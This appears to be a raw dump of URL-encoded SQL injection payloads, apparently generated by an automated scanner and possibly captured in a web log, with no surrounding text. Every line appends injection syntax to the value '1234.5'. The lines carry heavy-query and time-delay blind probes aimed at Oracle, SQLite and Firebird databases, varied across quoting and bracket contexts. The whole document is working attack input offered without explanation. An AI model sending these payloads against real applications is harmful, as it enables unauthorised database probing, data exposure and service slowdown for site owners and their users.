1234.5%27%29%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%27aXtz%27%20LIKE%20%27aXtz 1234.5%27%29%29%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%28%27DwlR%27%20LIKE%20%27DwlR 1234.5%27%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%27wCet%27%20LIKE%20%27wCet 1234.5%22%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%22EIIv%22%3D%22EIIv 1234.5%22%29%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%22AnbN%22%3D%22AnbN 1234.5%22%29%29%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%28%22MXlY%22%3D%22MXlY 1234.5%22%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%22ePSo%22%3D%22ePSo 1234.5%22%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%22Jpzu%22%20LIKE%20%22Jpzu 1234.5%22%29%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%22QRas%22%20LIKE%20%22QRas 1234.5%22%29%29%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%28%22aHFv%22%20LIKE%20%22aHFv 1234.5%22%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%22KufP%22%20LIKE%20%22KufP 1234.5%29%20WHERE%206159%3D6159%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%29%20WHERE%208314%3D8314%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%20WHERE%204964%3D4964%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%22%20WHERE%201968%3D1968%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%20%7C%7C%20%28SELECT%201296%20FROM%20DUAL%20WHERE%201294%3D1294%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207968%20WHERE%202363%3D2363%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%206143%20FROM%20DUAL%20WHERE%206574%3D6574%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29 1234.5%20%2B%20%28SELECT%203861%20WHERE%205250%3D5250%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29 1234.5%27%20%2B%20%28SELECT%20%27omdD%27%20FROM%20DUAL%20WHERE%206684%3D6684%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27nXyF%27%20WHERE%209981%3D9981%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%23 1234.5%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1234.5%27%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1234.5%27%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1234.5%22%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1234.5%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%281715%3D1715 1234.5%29%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%283730%3D3730 1234.5%29%29%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%285346%3D5346 1234.5%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1234.5%27%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%27NBDh%27%3D%27NBDh 1234.5%27%29%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%27zjam%27%3D%27zjam 1234.5%27%29%29%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%27yENs%27%3D%27yENs 1234.5%27%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%27tOlx%27%3D%27tOlx 1234.5%27%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%27wVnN%27%20LIKE%20%27wVnN 1234.5%27%29%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%27Dmtj%27%20LIKE%20%27Dmtj 1234.5%27%29%29%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%27IcxL%27%20LIKE%20%27IcxL 1234.5%27%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%27ZdeJ%27%20LIKE%20%27ZdeJ 1234.5%22%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%22QjiM%22%3D%22QjiM 1234.5%22%29%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%22wiRJ%22%3D%22wiRJ 1234.5%22%29%29%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%22cLSP%22%3D%22cLSP 1234.5%22%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%22nFGY%22%3D%22nFGY 1234.5%22%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%22aktQ%22%20LIKE%20%22aktQ 1234.5%22%29%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%22tQVv%22%20LIKE%20%22tQVv 1234.5%22%29%29%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%22AMQd%22%20LIKE%20%22AMQd 1234.5%22%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%22mzYt%22%20LIKE%20%22mzYt 1234.5%29%20WHERE%205999%3D5999%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1234.5%27%29%20WHERE%205130%3D5130%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1234.5%27%20WHERE%203949%3D3949%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1234.5%22%20WHERE%205758%3D5758%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 1234.5%27%20%7C%7C%20%28SELECT%205779%20FROM%20DUAL%20WHERE%207513%3D7513%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204841%20WHERE%201732%3D1732%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%204303%20FROM%20DUAL%20WHERE%205238%3D5238%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29 1234.5%20%2B%20%28SELECT%202015%20WHERE%207441%3D7441%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27zOfY%27%20FROM%20DUAL%20WHERE%202035%3D2035%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27musf%27%20WHERE%205948%3D5948%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%207259%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%23 1234.5%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1234.5%27%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1234.5%27%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1234.5%22%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1234.5%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%288079%3D8079 1234.5%29%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%287255%3D7255 1234.5%29%29%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%289073%3D9073 1234.5%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1234.5%27%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%27LenC%27%3D%27LenC 1234.5%27%29%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%27rphc%27%3D%27rphc 1234.5%27%29%29%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%28%27fEKc%27%3D%27fEKc 1234.5%27%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%27xqKh%27%3D%27xqKh 1234.5%27%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%27RGGY%27%20LIKE%20%27RGGY 1234.5%27%29%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%27tFds%27%20LIKE%20%27tFds 1234.5%27%29%29%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%28%27hubw%27%20LIKE%20%27hubw 1234.5%27%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%27sSCX%27%20LIKE%20%27sSCX 1234.5%22%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%22aocL%22%3D%22aocL 1234.5%22%29%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%22UjDz%22%3D%22UjDz 1234.5%22%29%29%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%28%22jVpX%22%3D%22jVpX 1234.5%22%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%22elNz%22%3D%22elNz 1234.5%22%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%22Etxp%22%20LIKE%20%22Etxp 1234.5%22%29%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%22XzbP%22%20LIKE%20%22XzbP 1234.5%22%29%29%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%28%22MjTF%22%20LIKE%20%22MjTF 1234.5%22%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%22eJvD%22%20LIKE%20%22eJvD 1234.5%29%20WHERE%206320%3D6320%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1234.5%27%29%20WHERE%202517%3D2517%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1234.5%27%20WHERE%201246%3D1246%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1234.5%22%20WHERE%208577%3D8577%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- 1234.5%27%20%7C%7C%20%28SELECT%208061%20FROM%20DUAL%20WHERE%205790%3D5790%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202121%20WHERE%204688%3D4688%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%207051%20FROM%20DUAL%20WHERE%209463%3D9463%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29 1234.5%20%2B%20%28SELECT%202879%20WHERE%207311%3D7311%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29 1234.5%27%20%2B%20%28SELECT%20%27rMfI%27%20FROM%20DUAL%20WHERE%209704%3D9704%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27jLRm%27%20WHERE%205223%3D5223%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%203894%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%23 1234.5%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1234.5%27%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1234.5%27%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1234.5%22%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1234.5%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%288015%3D8015 1234.5%29%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%288681%3D8681 1234.5%29%29%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%285865%3D5865 1234.5%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1234.5%27%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%27LfzW%27%3D%27LfzW 1234.5%27%29%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%27qWoK%27%3D%27qWoK 1234.5%27%29%29%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%27Qtbo%27%3D%27Qtbo 1234.5%27%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%27GacK%27%3D%27GacK 1234.5%27%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%27tRkI%27%20LIKE%20%27tRkI 1234.5%27%29%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%27ohdV%27%20LIKE%20%27ohdV 1234.5%27%29%29%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%27LAkc%27%20LIKE%20%27LAkc 1234.5%27%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%27OSPm%27%20LIKE%20%27OSPm 1234.5%22%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%22SQTA%22%3D%22SQTA 1234.5%22%29%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%22AbRu%22%3D%22AbRu 1234.5%22%29%29%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%22Dtxb%22%3D%22Dtxb 1234.5%22%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%22ahWS%22%3D%22ahWS 1234.5%22%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%22cWuM%22%20LIKE%20%22cWuM 1234.5%22%29%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%22wluu%22%20LIKE%20%22wluu 1234.5%22%29%29%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%22vjXX%22%20LIKE%20%22vjXX 1234.5%22%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%22dBZe%22%20LIKE%20%22dBZe 1234.5%29%20WHERE%207947%3D7947%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1234.5%27%29%20WHERE%203817%3D3817%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1234.5%27%20WHERE%206408%3D6408%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1234.5%22%20WHERE%201645%3D1645%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 1234.5%27%20%7C%7C%20%28SELECT%206165%20FROM%20DUAL%20WHERE%204621%3D4621%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205790%20WHERE%203649%3D3649%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%208643%20FROM%20DUAL%20WHERE%203607%3D3607%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29 1234.5%20%2B%20%28SELECT%203406%20WHERE%209154%3D9154%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27KoOL%27%20FROM%20DUAL%20WHERE%206029%3D6029%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27jibE%27%20WHERE%202241%3D2241%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%23 1234.5%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1234.5%27%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1234.5%27%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 